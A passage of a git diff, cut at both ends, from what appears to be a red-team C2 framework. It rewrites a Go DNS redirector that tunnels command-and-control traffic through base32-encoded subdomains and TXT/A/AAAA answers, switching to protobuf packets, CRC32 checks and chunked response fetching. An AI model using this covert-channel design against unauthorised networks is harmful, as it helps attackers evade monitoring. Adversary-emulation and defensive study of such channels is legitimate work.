checksum of complete request data +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +message FetchPayload { + uint32 chunk_index = 1; // Which chunk to fetch (0-based) +} + +// ResponseMetadata indicates the response is chunked and must be fetched +message ResponseMetadata { + uint32 total_chunks = 1; // Total number of response chunks + uint32 data_crc32 = 2; // CRC32 checksum of complete response data + uint32 chunk_size = 3; // Size of each chunk (last may be smaller) +} diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 8e1a04861..ecd60ac07 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -5,8 +5,8 @@ import ( "encoding/base32" "encoding/binary" "fmt" + "hash/crc32" "log/slog" - "math/rand" "net" "net/url" "strings" @@ -14,129 +14,56 @@ import ( "time" "google.golang.org/grpc" - "google.golang.org/grpc/codes" "google.golang.org/grpc/metadata" - "google.golang.org/grpc/status" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" "realm.pub/tavern/internal/redirectors" ) const ( - // DNS protocol limits - dnsHeaderSize = 12 // Standard DNS header size - maxLabelLength = 63 // Maximum bytes in a DNS label - txtRecordType = 16 // TXT record QTYPE - aRecordType = 1 // A record QTYPE - aaaaRecordType = 28 // AAAA record QTYPE - dnsClassIN = 1 // Internet class + convTimeout = 15 * time.Minute defaultUDPPort = "53" - convTimeout = 15 * time.Minute // Conversation expiration - - // Protocol field sizes (base36 encoding) - typeSize = 1 // Packet type: i/d/e/f - seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks - convIDSize = 12 // Conversation ID length - headerSize = typeSize + seqSize + convIDSize - - // Packet types - typeInit = 'i' // Init: establish conversation - typeData = 'd' // Data: send chunk - typeEnd = 'e' // End: finalize and process - typeFetch = 'f' // Fetch: retrieve response chunk - - // Response prefixes (TXT records) - respOK = "ok:" // Success with data - respMissing = "m:" // Missing chunks list - respError = "e:" // Error message - respChunked = "r:" // Response chunked metadata - - // Response size limits (to fit in single UDP packet) - maxDNSResponseSize = 1400 // Conservative MTU limit - maxResponseChunkSize = 1200 // Base32-encoded chunk size - - // DNS response constants - dnsResponseFlags = 0x8180 // Flags: Response, no error (0x81, 0x80) - dnsErrorFlags = 0x8183 // Flags: Response with name error (0x81, 0x83) - dnsPointerToQuestion = 0xC00C // Compression pointer to question at offset 12 - dnsTTLSeconds = 60 // DNS record TTL in seconds - txtMaxChunkSize = 255 // Maximum size of single TXT string - - // Localhost IP addresses (for benign responses) - localhostIPv4Octet1 = 127 - localhostIPv4Octet4 = 1 - localhostIPv6Byte15 = 1 // ::1 has only byte 15 set to 1, rest are 0 - - // Base36 encoding constants - base36Radix = 36 - base36Pow2 = 1296 // 36^2 - base36Pow3 = 46656 // 36^3 - base36Pow4 = 1679616 // 36^4 - - // CRC16-CCITT constants - crc16Init = 0xFFFF - crc16Polynomial = 0x1021 - crc16HighBit = 0x8000 + + // DNS protocol constants + dnsHeaderSize = 12 + maxLabelLength = 63 + txtRecordType = 16 + aRecordType = 1 + aaaaRecordType = 28 + dnsClassIN = 1 + dnsTTLSeconds = 60 + + // DNS response flags + dnsResponseFlags = 0x8180 + dnsErrorFlags = 0x8183 + dnsPointer = 0xC00C + + txtMaxChunkSize = 255 ) func init() { redirectors.Register("dns", &Redirector{}) } -func min(a, b int) int { - if a < b { - return a - } - return b -} - // Redirector handles DNS-based C2 communication type Redirector struct { - conversations sync.Map // conv_id -> *Conversation - baseDomains []string // Accepted base domains for queries -} - -// GetConversation retrieves a conversation by ID (for testing) -func (r *Redirector) GetConversation(convID string) (*Conversation, bool) { - val, ok := r.conversations.Load(convID) - if !ok { - return nil, false - } - return val.(*Conversation), true -} - -// StoreConversation stores a conversation (for testing) -func (r *Redirector) StoreConversation(convID string, conv *Conversation) { - r.conversations.Store(convID, conv) -} - -// CleanupConversationsOnce runs cleanup logic once (for testing) -func (r *Redirector) CleanupConversationsOnce(timeout time.Duration) { - now := time.Now() - r.conversations.Range(func(key, value interface{}) bool { - conv := value.(*Conversation) - conv.mu.Lock() - if now.Sub(conv.LastActivity) > timeout { - r.conversations.Delete(key) - } - conv.mu.Unlock() - return true - }) + conversations sync.Map + baseDomains []string } // Conversation tracks state for a request-response exchange type Conversation struct { - mu sync.Mutex - ID string // Exported for testing - MethodPath string // gRPC method path (exported for testing) - TotalChunks int // Expected number of request chunks (exported for testing) - ExpectedCRC uint16 // CRC16 of complete request data (exported for testing) - Chunks map[int][]byte // Received request chunks (exported for testing) - LastActivity time.Time // Exported for testing - - // Response chunking (for large responses) - ResponseData []byte // Exported for testing - ResponseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) (exported for testing) - ResponseCRC uint16 // Exported for testing - IsBinaryChunking bool // true for A/AAAA, false for TXT (exported for testing) + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + MaxResponseSize int // Max size per DNS response packet } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { @@ -179,7 +106,7 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr if netErr, ok := err.(net.Error); ok && netErr.Timeout() { continue } - slog.Error("failed to read UDP packet", "error", err) + slog.Error("failed to read UDP", "error", err) continue } @@ -189,7 +116,6 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } // ParseListenAddr extracts address and domain parameters from listenOn string -// Format: "addr:port?domain=example.com&domain=other.com" func ParseListenAddr(listenOn string) (string, []string, error) { parts := strings.SplitN(listenOn, "?", 2) addr := parts[0] @@ -217,7 +143,7 @@ func ParseListenAddr(listenOn string) (string, []string, error) { if key == "domain" && value != "" { decoded, err := url.QueryUnescape(value) if err != nil { - return "", nil, fmt.Errorf("failed to decode domain value: %w", err) + return "", nil, fmt.Errorf("failed to decode domain: %w", err) } domains = append(domains, decoded) } @@ -241,7 +167,6 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { conv.mu.Lock() if now.Sub(conv.LastActivity) > convTimeout { r.conversations.Delete(key) - slog.Debug("conversation expired", "conv_id", conv.ID) } conv.mu.Unlock() return true @@ -264,478 +189,328 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr return } - // Normalize domain to lowercase for case-insensitive matching domain = strings.ToLower(domain) - slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) - domainParts := strings.Split(domain, ".") - var subdomainParts []string - var matchedBaseDomain string - - for _, baseDomain := range r.baseDomains { - baseDomainParts := strings.Split(baseDomain, ".") - - if len(domainParts) <= len(baseDomainParts) { - continue - } - - domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] - matched := true - for i, part := range baseDomainParts { - if !strings.EqualFold(part, domainSuffix[i]) { - matched = false - break - } - } - - if matched { - subdomainParts = domainParts[:len(domainParts)-len(baseDomainParts)] - matchedBaseDomain = baseDomain - break - } - } - - if matchedBaseDomain == "" { - slog.Debug("domain doesn't match any configured base domains", "domain", domain, "base_domains", r.baseDomains) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - if len(subdomainParts) < 1 { - slog.Debug("no subdomain found", "domain", domain, "matched_base_domain", matchedBaseDomain) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - // Reassemble all subdomain labels (they form a base32-encoded packet) - fullSubdomain := strings.Join(subdomainParts, "") - - // Decode base32 to get raw packet bytes - packetBytes, err := decodeBase32(fullSubdomain) + // Extract subdomain + subdomain, err := r.extractSubdomain(domain) if err != nil { - // For A/AAAA queries, this is likely a DNS resolver doing lookups (not C2 traffic) - // Return a benign response instead of an error to avoid polluting logs - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring non-C2 resolver query", "query_type", queryType, "domain", domain) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) - r.sendErrorResponse(conn, addr, transactionID) - return - } - - // Parse packet: [type:1][seq:5][convid:12][data...] - if len(packetBytes) < headerSize { - // For A/AAAA queries with invalid packet structure, likely resolver lookups - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring malformed resolver query", "query_type", queryType, "domain", domain, "size", len(packetBytes)) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) + slog.Debug("domain doesn't match base domains", "domain", domain) r.sendErrorResponse(conn, addr, transactionID) return } - pktType := rune(packetBytes[0]) - seqStr := string(packetBytes[typeSize : typeSize+seqSize]) - convID := string(packetBytes[typeSize+seqSize : headerSize]) - data := packetBytes[headerSize:] // Keep as []byte, don't convert to string - - slog.Debug("parsed packet", "type", string(pktType), "seq_str", seqStr, "conv_id", convID, "data_len", len(data), "total_packet_len", len(packetBytes)) - - seq, err := decodeSeq(seqStr) + // Decode packet + packet, err := r.decodePacket(subdomain) if err != nil { - // For A/AAAA queries, invalid sequence likely means resolver lookup - if queryType == aRecordType || queryType == aaaaRecordType { - slog.Debug("ignoring resolver query with invalid sequence", "query_type", queryType, "domain", domain) - r.sendBenignResponse(conn, addr, transactionID, domain, queryType) - return - } - slog.Debug("invalid sequence", "seq", seqStr, "error", err) + slog.Debug("failed to decode packet", "error", err) r.sendErrorResponse(conn, addr, transactionID) return } + slog.Debug("parsed packet", "type", packet.Type, "seq", packet.Sequence, "conv_id", packet.ConversationId) + + // Handle packet based on type var responseData []byte - switch pktType { - case typeInit: - responseData, err = r.HandleInitPacket(convID, string(data)) - case typeData: - responseData, err = r.HandleDataPacket(convID, seq, data) - case typeEnd: - responseData, err = r.HandleEndPacket(ctx, upstream, convID, seq, queryType) - case typeFetch: - responseData, err = r.HandleFetchPacket(convID, seq) + switch packet.Type { + case dnspb.PacketType_PACKET_TYPE_INIT: + responseData, err = r.handleInitPacket(packet) + case dnspb.PacketType_PACKET_TYPE_DATA: + responseData, err = r.handleDataPacket(packet) + case dnspb.PacketType_PACKET_TYPE_END: + responseData, err = r.handleEndPacket(ctx, upstream, packet, queryType) + case dnspb.PacketType_PACKET_TYPE_FETCH: + responseData, err = r.handleFetchPacket(packet) default: - err = fmt.Errorf("unknown packet type: %c", pktType) + err = fmt.Errorf("unknown packet type: %d", packet.Type) } if err != nil { - slog.Error("failed to handle packet", "type", string(pktType), "error", err) - errorResp := fmt.Sprintf("%s%s", respError, err.Error()) - r.sendDNSResponse(conn, addr, transactionID, domain, []byte(errorResp), queryType) + slog.Error("failed to handle packet", "type", packet.Type, "error", err) + r.sendErrorResponse(conn, addr, transactionID) return } - var maxCapacity int - switch queryType { - case txtRecordType: - maxCapacity = maxDNSResponseSize - case aRecordType: - maxCapacity = 4 - case aaaaRecordType: - maxCapacity = 16 - default: - maxCapacity = maxDNSResponseSize - } - - slog.Debug("checking if chunking needed", "query_type", queryType, "response_size", len(responseData), - "max_capacity", maxCapacity, "packet_type", string(pktType)) - - if queryType != txtRecordType && len(responseData) > maxCapacity && (pktType == typeEnd || pktType == typeInit) { - var conv *Conversation - var actualConvID string - - if pktType == typeInit { - actualConvID = convID - conv = &Conversation{ - ID: actualConvID, - LastActivity: time.Now(), - ResponseData: responseData, - ResponseCRC: CalculateCRC16(responseData), - IsBinaryChunking: true, - } - r.conversations.Store(actualConvID, conv) - } else { - convVal, ok := r.conversations.Load(convID) - if !ok { - slog.Error("conversation not found for chunking", "conv_id", convID) - r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) - return - } - conv = convVal.(*Conversation) - actualConvID = convID - } + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, responseData) +} - conv.mu.Lock() +func (r *Redirector) extractSubdomain(domain string) (string, error) { + domainParts := strings.Split(domain, ".") - conv.ResponseData = responseData - conv.ResponseCRC = CalculateCRC16(responseData) - conv.IsBinaryChunking = true + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") - conv.ResponseChunks = nil - for i := 0; i < len(responseData); i += maxCapacity { - end := i + maxCapacity - if end > len(responseData) { - end = len(responseData) - } - conv.ResponseChunks = append(conv.ResponseChunks, string(responseData[i:end])) + if len(domainParts) <= len(baseDomainParts) { + continue } - conv.mu.Unlock() - - var response []byte - if maxCapacity <= 4 { - if len(conv.ResponseChunks) > 65535 { - slog.Error("too many chunks for binary format", "chunks", len(conv.ResponseChunks)) - r.sendErrorResponse(conn, addr, transactionID) - return + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break } - response = make([]byte, 4) - response[0] = 0xFF - response[1] = byte(len(conv.ResponseChunks) >> 8) - response[2] = byte(len(conv.ResponseChunks) & 0xFF) - response[3] = byte(conv.ResponseCRC & 0xFF) - - slog.Debug("using compact binary chunked indicator", - "chunks", len(conv.ResponseChunks), "crc_low", response[3]) - } else { - responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) - response = []byte(responseStr) } - slog.Debug("response too large for record type, using multi-query chunking", - "conv_id", actualConvID, "packet_type", string(pktType), "data_size", len(responseData), - "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.ResponseChunks), - "indicator_size", len(response)) - - r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) - return + if matched { + subdomainParts := domainParts[:len(domainParts)-len(baseDomainParts)] + return strings.Join(subdomainParts, "."), nil + } } - success := r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) - - if success && pktType == typeEnd && !strings.HasPrefix(string(responseData), respChunked) { - r.conversations.Delete(convID) - slog.Debug("conversation completed and cleaned up", "conv_id", convID) - } + return "", fmt.Errorf("no matching base domain") } -// HandleInitPacket processes init packet and creates conversation -// Init payload format: [method_code:2][total_chunks:5][crc:4] -func (r *Redirector) HandleInitPacket(tempConvID string, data string) ([]byte, error) { - slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) +// decodePacket decodes DNS packet from subdomain +// Subdomain format: . +// The entire protobuf packet is base32-encoded and split into 63-char labels +func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { + // Remove all dots to get continuous base32 string + // Labels were split at 63-char boundaries, now rejoin them + encodedData := strings.ReplaceAll(subdomain, ".", "") - // Payload: method(2) + chunks(5) + crc(4) = 11 chars - if len(data) < 11 { - slog.Debug("init payload too short", "expected", 11, "got", len(data)) - return nil, fmt.Errorf("init payload too short: expected 11, got %d", len(data)) + // Decode data using Base32 (case-insensitive, no padding) + packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) + if err != nil { + return nil, fmt.Errorf("failed to decode Base32 data: %w", err) } - methodCode := data[:2] - totalChunksStr := data[2:7] - crcStr := data[7:11] - - slog.Debug("parsing init payload", "method_code", methodCode, "chunks_str", totalChunksStr, "crc_str", crcStr) - - totalChunks, err := decodeSeq(totalChunksStr) - if err != nil { - return nil, fmt.Errorf("invalid total chunks: %w", err) + // Unmarshal protobuf + var packet dnspb.DNSPacket + if err := proto.Unmarshal(packetData, &packet); err != nil { + return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) } - // CRC is base36-encoded (4 chars) - expectedCRC, err := decodeBase36CRC(crcStr) - if err != nil { - return nil, fmt.Errorf("invalid CRC: %w", err) + // Verify CRC for data packets + if packet.Type == dnspb.PacketType_PACKET_TYPE_DATA && len(packet.Data) > 0 { + actualCRC := crc32.ChecksumIEEE(packet.Data) + if actualCRC != packet.Crc32 { + return nil, fmt.Errorf("CRC mismatch: expected %d, got %d", packet.Crc32, actualCRC) + } } - methodPath := codeToMethod(methodCode) - realConvID := generateConvID() + return &packet, nil +} + +// handleInitPacket processes INIT packet +func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + // Unmarshal init payload + var initPayload dnspb.InitPayload + if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) + } + // Create conversation conv := &Conversation{ - ID: realConvID, - MethodPath: methodPath, - TotalChunks: totalChunks, - ExpectedCRC: uint16(expectedCRC), - Chunks: make(map[int][]byte), + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + Chunks: make(map[uint32][]byte), LastActivity: time.Now(), } - r.conversations.Store(realConvID, conv) + r.conversations.Store(packet.ConversationId, conv) - slog.Debug("created conversation", "conv_id", realConvID, "method", methodPath, "total_chunks", totalChunks) + slog.Debug("created conversation", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks) - return []byte(realConvID), nil + return []byte("ok"), nil } -// HandleDataPacket stores a data chunk in the conversation -func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleDataPacket processes DATA packet +func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() + // Store chunk (sequence is 1-indexed) + conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() - // Ignore chunks beyond declared total (duplicates/retransmissions) - if seq >= conv.TotalChunks { - slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.TotalChunks) - return []byte{}, nil - } - - conv.Chunks[seq] = data - - dataPreview := "" - if len(data) > 0 { - previewLen := min(len(data), 16) - dataPreview = fmt.Sprintf("%x", data[:previewLen]) - } - - slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) + slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - // Return acknowledgment - return []byte{}, nil + return []byte("ok"), nil } -// HandleEndPacket processes end packet and returns server response -func (r *Redirector) HandleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleEndPacket processes END packet and forwards to upstream +func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() - conv.LastActivity = time.Now() - - slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.Chunks)) - - // Check for missing chunks - var missing []int - for i := 0; i < conv.TotalChunks; i++ { - if _, ok := conv.Chunks[i]; !ok { - missing = append(missing, i) - } + // Check if all chunks received + if uint32(len(conv.Chunks)) != conv.TotalChunks { + return nil, fmt.Errorf("missing chunks: received %d, expected %d", len(conv.Chunks), conv.TotalChunks) } - if len(missing) > 0 { - // Return missing chunks list - missingStrs := make([]string, len(missing)) - for i, seq := range missing { - missingStrs[i] = encodeSeq(seq) + // Reassemble data (chunks are 1-indexed) + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + if !ok { + return nil, fmt.Errorf("missing chunk %d", i) } - response := fmt.Sprintf("%s%s", respMissing, strings.Join(missingStrs, ",")) - - slog.Debug("returning missing chunks", "conv_id", convID, "count", len(missing), "missing_seqs", missing) - - return []byte(response), nil + fullData = append(fullData, chunk...) } - // Reassemble data (chunks now contain raw binary, not base32) - requestData := r.reassembleChunks(conv.Chunks, conv.TotalChunks) - - // Sanity check: ensure we have exactly the right number of chunks - if len(conv.Chunks) != conv.TotalChunks { - slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) - return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.Chunks), conv.TotalChunks)), nil + // Verify CRC + actualCRC := crc32.ChecksumIEEE(fullData) + if actualCRC != conv.ExpectedCRC { + return nil, fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) } - slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) - - // Verify CRC (chunks already contain raw decrypted data) - actualCRC := CalculateCRC16(requestData) - expectedCRC := uint16(conv.ExpectedCRC) - - slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.Chunks), "chunks_expected", conv.TotalChunks) - - if actualCRC != expectedCRC { - errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) - slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) - return []byte(respError + "invalid_crc"), nil - } - slog.Debug("reassembled and validated data", "conv_id", convID, "bytes", len(requestData)) + slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) // Forward to upstream gRPC server - responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, requestData) + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { return nil, fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine if we need to base32-encode the response - // For A/AAAA records that will use binary chunking, return raw binary - // For TXT records, return base32-encoded with "ok:" prefix - useBinaryChunking := (queryType == aRecordType || queryType == aaaaRecordType) - - if useBinaryChunking { - // Return raw binary data for A/AAAA records - // The main handler will chunk this if needed - return responseData, nil + // Determine max response size based on record type to fit in UDP packet + // For A/AAAA records with multiple records, we need much smaller chunks + // to avoid creating packets with 100+ DNS records + var maxSize int + switch queryType { + case txtRecordType: + maxSize = 400 // TXT can handle larger chunks in single record + case aRecordType: + maxSize = 64 // A records: 64 bytes = 16 A records (16 * 4 bytes) + case aaaaRecordType: + maxSize = 128 // AAAA records: 128 bytes = 8 AAAA records (8 * 16 bytes) + default: + maxSize = 400 } - // For TXT records, use base32 encoding - encodedResponse := encodeBase32(responseData) - responseWithPrefix := respOK + encodedResponse - - if len(responseWithPrefix) > maxDNSResponseSize { - // Response too large - chunk it - slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) - - // Store response data in conversation + // Check if response needs chunking + if len(responseData) > maxSize { + // Calculate CRC for full response + conv.ResponseCRC = crc32.ChecksumIEEE(responseData) conv.ResponseData = responseData - conv.ResponseCRC = CalculateCRC16(responseData) // Use full 16-bit CRC - // Chunk the encoded response + // Split into chunks conv.ResponseChunks = nil - for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { - end := i + maxResponseChunkSize - if end > len(encodedResponse) { - end = len(encodedResponse) + for i := 0; i < len(responseData); i += maxSize { + end := i + maxSize + if end > len(responseData) { + end = len(responseData) } - conv.ResponseChunks = append(conv.ResponseChunks, encodedResponse[i:end]) + conv.ResponseChunks = append(conv.ResponseChunks, responseData[i:end]) } - // Return chunked response indicator: "r:[num_chunks]:[crc]" - response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) - slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.ResponseChunks), "crc", conv.ResponseCRC) - return []byte(response), nil + conv.LastActivity = time.Now() + + slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), + "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + + // Return metadata about chunked response + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: uint32(maxSize), + } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + return metadataBytes, nil } - return []byte(responseWithPrefix), nil + // Response fits in single packet + conv.ResponseData = responseData + conv.LastActivity = time.Now() + + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + + return []byte("ok"), nil } -// HandleFetchPacket serves a response chunk to the client -func (r *Redirector) HandleFetchPacket(convID string, chunkSeq int) ([]byte, error) { - convVal, ok := r.conversations.Load(convID) +// handleFetchPacket processes FETCH packet +func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) if !ok { - return nil, fmt.Errorf("unknown conversation: %s", convID) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } - conv := convVal.(*Conversation) + conv := val.(*Conversation) conv.mu.Lock() defer conv.mu.Unlock() + if conv.ResponseData == nil { + return nil, fmt.Errorf("no response data available") + } + conv.LastActivity = time.Now() - // Check if this is the final fetch (cleanup request) - if chunkSeq >= len(conv.ResponseChunks) { - // Client is done fetching - clean up conversation - r.conversations.Delete(convID) - slog.Debug("conversation completed and cleaned up", "conv_id", convID) - return []byte(respOK), nil - } + // Check if response was chunked + if len(conv.ResponseChunks) > 0 { + // Parse fetch payload to get chunk index + var fetchPayload dnspb.FetchPayload + if len(packet.Data) > 0 { + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + } + } - // Return the requested chunk - if chunkSeq < 0 || chunkSeq >= len(conv.ResponseChunks) { - return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.ResponseChunks)) - } + chunkIndex := int(fetchPayload.ChunkIndex) - chunk := conv.ResponseChunks[chunkSeq] - slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.IsBinaryChunking) + if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk index: %d (total: %d)", chunkIndex, len(conv.ResponseChunks)) + } - // For binary chunking (A/AAAA), return raw bytes - // For text chunking (TXT), return "ok:" prefix + base32 data - if conv.IsBinaryChunking { - return []byte(chunk), nil - } - return []byte(respOK + chunk), nil -} + slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", chunkIndex, + "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) -// reassembleChunks combines chunks in order -func (r *Redirector) reassembleChunks(chunks map[int][]byte, totalChunks int) []byte { - var result []byte - for i := 0; i < totalChunks; i++ { - if chunk, ok := chunks[i]; ok { - slog.Debug("reassembling chunk", "seq", i, "chunk_len", len(chunk), "total_so_far", len(result)) - result = append(result, chunk...) - } else { - // This should never happen since we check for missing chunks first - slog.Error("CRITICAL: Missing chunk during reassembly", "seq", i, "total_chunks", totalChunks, "chunks_present", len(chunks)) + // Clean up if this is the last chunk + if chunkIndex == len(conv.ResponseChunks)-1 { + defer r.conversations.Delete(packet.ConversationId) + slog.Debug("conversation completed", "conv_id", conv.ID) } + + return conv.ResponseChunks[chunkIndex], nil } - slog.Debug("reassembly complete", "final_len", len(result), "total_chunks", totalChunks) - return result + + // Single response (not chunked) + defer r.conversations.Delete(packet.ConversationId) + + slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) + + return conv.ResponseData, nil } // forwardToUpstream sends request to gRPC server and returns response func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { - // Create gRPC stream + // Create gRPC stream with the raw codec md := metadata.New(map[string]string{}) ctx = metadata.NewOutgoingContext(ctx, md) + // Determine if this is a streaming method + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ StreamName: methodPath, - ServerStreams: true, - ClientStreams: true, + ServerStreams: isServerStreaming, + ClientStreams: isClientStreaming, }, methodPath, grpc.CallContentSubtype("raw")) if err != nil { return nil, fmt.Errorf("failed to create stream: %w", err) } - // Determine request/response streaming types - isClientStreaming := methodPath == "/c2.C2/ReportFile" - isServerStreaming := methodPath == "/c2.C2/FetchAsset" - + // Send request if isClientStreaming { - // For client streaming, parse length-prefixed chunks and send individually + // For client streaming (ReportFile), parse length-prefixed chunks and send individually offset := 0 chunkCount := 0 for offset < len(requestData) { @@ -751,7 +526,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) } - // Send individual chunk + // Send individual chunk (already encrypted) chunk := requestData[offset : offset+int(msgLen)] if err := stream.SendMsg(chunk); err != nil { return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) @@ -765,7 +540,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } else { // For unary/server-streaming, send the request as-is if err := stream.SendMsg(requestData); err != nil { - return nil, fmt.Errorf("failed to send message: %w", err) + return nil, fmt.Errorf("failed to send request: %w", err) } } @@ -775,61 +550,54 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien // Receive response(s) var responseData []byte - responseCount := 0 - for { - var msg []byte - err := stream.RecvMsg(&msg) - if err != nil { - // Check if EOF (normal end of stream) - if stat, ok := status.FromError(err); ok { - if 